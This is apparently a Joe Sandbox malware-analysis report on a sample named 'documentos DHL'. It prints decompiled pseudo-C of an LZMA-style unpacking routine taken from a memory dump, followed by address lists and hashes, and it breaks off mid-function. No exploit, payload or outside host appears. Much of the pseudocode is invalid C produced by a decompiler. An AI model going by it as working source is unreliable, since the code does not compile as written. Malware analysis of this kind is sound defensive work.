												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406eef
0x00406eef
0x00406eef
0x00406eef
0x00406ef5
0x00406ef9
0x00406efd
0x00406f07
0x00406f15
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00407222
0x00407222
0x00407226
0x00000000
0x00000000
0x00407228
0x00407231
0x00407237
0x0040723a
0x0040723d
0x00407240
0x00407243
0x00407249
0x00407262
0x00407265
0x00407271
0x00407272
0x00407275
0x0040724b
0x0040724b
0x0040725a
0x0040725d
0x0040725d
0x0040727f
0x0040721f
0x0040721f
0x0040721f
0x00407222
0x00407226
0x00000000
0x00000000
0x00000000
0x00407281
0x00407281
0x004071fa
0x004071fe
0x00407336
0x00407336
0x00407340
0x00407348
0x0040734f
0x00407351
0x00407358
0x0040735c
0x0040735c
0x00407204
0x0040720a
0x00407211
0x00407219
0x00407219
0x0040721c
0x00000000
0x0040721c
0x00407286
0x00407293
0x00407296
0x004071a2
0x004071a2
0x004071a2
0x0040693e
0x0040693e
0x0040693e
0x00406947
0x00000000
0x00000000
0x0040694d
0x0040694d
0x00000000
0x00406954
0x00406958
0x00000000
0x00000000
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696b
0x00000000
0x00000000
0x00406971
0x00406971
0x00406974
0x00406976
0x00406977
0x0040697a
0x0040697c
0x0040697d
0x0040697f
0x00406982
0x00406987
0x0040698c
0x00406995
0x004069a8
0x004069ab
0x004069b7
0x004069df
0x004069e1
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004069e3
0x004069e3
0x004069e6
0x004069e7
0x004069e7
0x00000000
0x004069e3
0x004069b9
0x004069bd
0x004069c2
0x004069c2
0x004069cb
0x004069d3
0x004069d6
0x00000000
0x004069dc
0x004069dc
0x00000000
0x004069dc
0x00000000
0x004069f9
0x004069f9
0x004069fd
0x004072a9
0x004072a9
0x00000000
0x004072a9
0x00406a03
0x00406a06
0x00406a16
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1c
0x00406a1f
0x00406a23
0x00000000
0x00000000
0x00406a25
0x00406a25
0x00406a2b
0x00406a55
0x00406a5b
0x00406a62
0x00000000
0x00406a62
0x00406a2d
0x00406a31
0x00406a34
0x00406a39
0x00406a39
0x00406a44
0x00406a4c
0x00406a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a94
0x00406a9a
0x00406a9d
0x00406aaa
0x00406ab2
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a6d
0x004072b8
0x004072b8
0x00000000
0x004072b8
0x00406a73
0x00406a79
0x00406a84
0x00406a84
0x00406a84
0x00406a87
0x00406a8a
0x00406a8d
0x00406a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407177
0x0040717b
0x0040732a
0x0040732a
0x00000000
0x0040732a
0x00407181
0x00407187
0x0040718e
0x00407196
0x00407199
0x0040719c
0x0040719c
0x004071a2
0x004071a2
0x00000000
0x00000000
0x00406aba
0x00406aba
0x00406abc
0x00406abf
0x00406b30
0x00406b30
0x00406b33
0x00406b36
0x00406b3d
0x00406b47
0x00000000
0x00406b47
0x00406ac1
0x00406ac1
0x00406ac5
0x00406ac8
0x00406aca
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad7
0x00406adc
0x00406adf
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af7
0x00406afb
0x00406b03
0x00406b03
0x00406b03
0x00406afd
0x00406afd
0x00406afd
0x00406af2
0x00406af2
0x00406af2
0x00406b07
0x00406b0a
0x00406b28
0x00406b28
0x00406b2a
0x00000000
0x00406b0c
0x00406b0c
0x00406b0c
0x00406b0f
0x00406b12
0x00406b15
0x00406b17
0x00406b17
0x00406b17
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b20
0x00406b23
0x00000000
0x00406b23
0x00000000
0x00406d59
0x00406d59
0x00406d5d
0x00406d7b
0x00406d7b
0x00406d7e
0x00406d85
0x00406d88
0x00406d8b
0x00406d8e
0x00406d91
0x00406d94
0x00406d96
0x00406d9d
0x00406d9e
0x00406da0
0x00406da3
0x00406da6
0x00406da9
0x00406da9
0x00406dae
0x00000000
0x00406dae
0x00406d5f
0x00406d5f
0x00406d62
0x00406d65
0x00406d6f
0x00000000
0x00000000
0x00406dc3
0x00406dc3
0x00406dc7
0x00406dea
0x00406ded
0x00406df0
0x00406dfa
0x00406dc9
0x00406dc9
0x00406dcc
0x00406dcf
0x00406dd2
0x00406ddf
0x00406de2
0x00406de2
0x00000000
0x00000000
0x00406e06
0x00406e06
0x00406e0a
0x00000000
0x00000000
0x00406e10
0x00406e10
0x00406e14
0x00000000
0x00000000
0x00406e1a
0x00406e1a
0x00406e1c
0x00406e20
0x00406e20
0x00406e23
0x00406e27
0x00000000
0x00000000
0x00406e77
0x00406e77
0x00406e7b
0x00406e82
0x00406e82
0x00406e85
0x00406e88
0x00406e92
0x00000000
0x00406e92
0x00406e7d
0x00406e7d
0x00000000
0x00000000
0x00406e9e
0x00406e9e
0x00406ea2
0x00406ea9
0x00406eac
0x00406eaf
0x00406ea4
0x00406ea4
0x00406ea4
0x00406eb2
0x00406eb5
0x00406eb8
0x00406eb8
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ecb
0x00406ed0
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f62
0x00407300
0x00407300
0x00000000
0x00407300
0x00406f68
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f75
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f7d
0x00406f80
0x00406f83
0x00000000
0x00000000
0x00406b53
0x00406b53
0x00406b57
0x004072c4
0x004072c4
0x00000000
0x004072c4
0x00406b5d
0x00406b5d
0x00406b60
0x00406b63
0x00406b67
0x00406b6a
0x00406b70
0x00406b72
0x00406b72
0x00406b72
0x00406b75
0x00406b78
0x00406b78
0x00406b7b
0x00406b7e
0x00000000
0x00000000
0x00406b84
0x00406b84
0x00406b8a
0x00000000
0x00000000
0x00406b90
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00406ba0
0x00406ba1
0x00406ba4
0x00406ba6
0x00406bac
0x00406baf
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbb
0x00406bbe
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406bea
0x00406bee
0x00406bf0
0x00406bf4
0x00406bc0
0x00406bc0
0x00406bc4
0x00406bcc
0x00406bd1
0x00406bd3
0x00406bd5
0x00406bd5
0x00406bf7
0x00406bfe
0x00406c01
0x00000000
0x00406c07
0x00406c07
0x00000000
0x00406c07
0x00000000
0x00406c0c
0x00406c0c
0x00406c10
0x004072d0
0x004072d0
0x00000000
0x004072d0
0x00406c16
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c23
0x00406c29
0x00406c2b
0x00406c2b
0x00406c2b
0x00406c2e
0x00406c31
0x00406c31
0x00406c31
0x00406c37
0x00000000
0x00000000
0x00406c39
0x00406c39
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c48
0x00406c4b
0x00406c4e
0x00406c51
0x00406c54
0x00406c57
0x00406c6f
0x00406c72
0x00406c75
0x00406c78
0x00406c78
0x00406c7b
0x00406c7f
0x00406c81
0x00406c59
0x00406c59
0x00406c61
0x00406c66
0x00406c68
0x00406c6a
0x00406c6a
0x00406c84
0x00406c8b
0x00406c8e
0x00000000
0x00406c90
0x00406c90
0x00000000
0x00406c90
0x00406c8e
0x00406c95
0x00406c95
0x00406c95
0x00406c95
0x00000000
0x00000000
0x00406cd0
0x00406cd0
0x00406cd4
0x004072dc
0x004072dc
0x00000000
0x004072dc
0x00406cda
0x00406cda
0x00406cdd
0x00406ce0
0x00406ce4
0x00406ce7
0x00406ced
0x00406cef
0x00406cef
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf5
0x00406cfb
0x00406c99
0x00406c99
0x00406c9c
0x00000000
0x00406c9c
0x00406cfd
0x00406cfd
0x00406d00
0x00406d03
0x00406d06
0x00406d09
0x00406d0c
0x00406d0f
0x00406d12
0x00406d15
0x00406d18
0x00406d1b
0x00406d33
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d43
0x00406d45
0x00406d1d
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2c
0x00406d2e
0x00406d2e
0x00406d48
0x00406d4f
0x00406d52
0x00000000
0x00406d54
0x00406d54
0x00000000
0x00406d54
0x00000000
0x00406fe1
0x00406fe1
0x00406fe5
0x0040730c
0x0040730c
0x00000000
0x0040730c
0x00406feb
0x00406feb
0x00406fee
0x00406ff1
0x00406ff5
0x00406ff8
0x00406ffe
0x00407000
0x00407000
0x00407000
0x00407003
0x00000000
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00000000
0x00000000
0x004070f0
0x004070f0
0x004070f4
0x00407116
0x00407116
0x00407119
0x00407123
0x00407126
0x00407126
0x00000000
0x00407126
0x004070f6
0x004070f6
0x004070f9
0x004070fd
0x00407100
0x00407100
0x00407103
0x00000000
0x00000000
0x004071ad
0x004071ad
0x004071b1
0x004071cf
0x004071cf
0x004071cf
0x004071cf
0x004071d6
0x004071dd
0x004071e4
0x004071e4
0x004071eb
0x004071ee
0x004071f5
0x00000000
0x004071f8
0x004071b3
0x004071b3
0x004071b6
0x004071b9
0x004071bc
0x004071c3
0x00407107
0x00407107
0x0040710a
0x00000000
0x00000000
0x0040729e
0x0040729e
0x004072a1
0x004071a2
0x004071a2
0x004071a2
0x00000000
0x004071a8
0x00000000
0x00406ed8
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00000000
0x00000000
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00000000
0x004071f8
0x00000000
0x00000000
0x00000000
0x00406f1d
0x00406f1d
0x00406f20
0x00406f56
0x00406f56
0x00407086
0x00407086
0x00407086
0x00407086
0x00407089
0x00407089
0x0040708c
0x0040708e
0x00407318
0x00407318
0x00000000
0x00407318
0x00407094
0x00407094
0x00407097
0x00000000
0x00000000
0x0040709d
0x0040709d
0x004070a1
0x004070a4
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406f22
0x00406f22
0x00406f24
0x00406f26
0x00406f28
0x00406f2b
0x00406f2c
0x00406f2e
0x00406f30
0x00406f33
0x00406f36
0x00406f4c
0x00406f4c
0x00406f51
0x00406f89
0x00406f89
0x00406f8d
0x00406fb6
0x00406fb9
0x00406fbb
0x00406fc2
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fcd
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd9
0x00406fdc
0x00407009
0x00407009
0x0040700c
0x0040700f
0x00407083
0x00407083
0x00407083
0x00407083
0x00000000
0x00407083
0x00407011
0x00407011
0x00407017
0x0040701a
0x0040701d
0x00407020
0x00407023
0x00407026
0x00407029
0x0040702c
0x0040702f
0x00407032
0x0040704b
0x0040704d
0x00407050
0x00407051
0x00407054
0x00407056
0x00407059
0x0040705b
0x0040705d
0x00407060
0x00407062
0x00407065
0x00407069
0x0040706b
0x0040706b
0x0040706c
0x0040706f
0x00407072
0x00407034
0x00407034
0x0040703c
0x00407041
0x00407043
0x00407046
0x00407046
0x00407075
0x0040707c
0x00407006
0x00407006
0x00407006
0x00407006
0x00000000
0x0040707e
0x0040707e
0x00000000
0x0040707e
0x0040707c
0x00406f8f
0x00406f8f
0x00406f92
0x00406f94
0x00406f97
0x00406f9a
0x00406f9d
0x00406f9f
0x00406fa2
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fa8
0x00406fab
0x00406fb2
0x00406f86
0x00406f86
0x00406f86
0x00406f86
0x00000000
0x00406fb4
0x00406fb4
0x00000000
0x00406fb4
0x00406fb2
0x00406f38
0x00406f38
0x00406f3b
0x00406f3d
0x00406f40
0x00000000
0x00000000
0x00406c9f
0x00406c9f
0x00406ca3
0x004072e8
0x004072e8
0x00000000
0x004072e8
0x00406ca9
0x00406ca9
0x00406cac
0x00406caf
0x00406cb2
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbd
0x00406cc0
0x00406cc3
0x00406cc6
0x00406cc8
0x00406cc8
0x00406cc8
0x00000000
0x00000000
0x00406e2a
0x00406e2a
0x00406e2e
0x004072f4
0x004072f4
0x00000000
0x004072f4
0x00406e34
0x00406e34
0x00406e37
0x00406e3a
0x00406e3d
0x00406e3f
0x00406e3f
0x00406e3f
0x00406e42
0x00406e45
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e52
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e60
0x00406e60
0x00406e63
0x00406e65
0x00406e65
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070a7
0x004070ab
0x00000000
0x00000000
0x004070b1
0x004070b1
0x004070b4
0x004070b7
0x004070ba
0x004070bc
0x004070bc
0x004070bc
0x004070bf
0x004070c2
0x004070c5
0x004070c8
0x004070cb
0x004070ce
0x004070cf
0x004070d1
0x004070d1
0x004070d1
0x004070d4
0x004070d7
0x004070da
0x004070dd
0x004070e0
0x004070e4
0x004070e6
0x004070e9
0x00000000
0x004070eb
0x004070eb
0x00406e68
0x00406e68
0x00000000
0x00406e68
0x004070e9
0x0040731e
0x0040731e
0x00000000
0x00000000
0x0040694d
0x00407355
0x00407355
0x00000000
0x00407355
0x004071a2
0x00407222
0x004071eb

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070F0 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004070F0() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
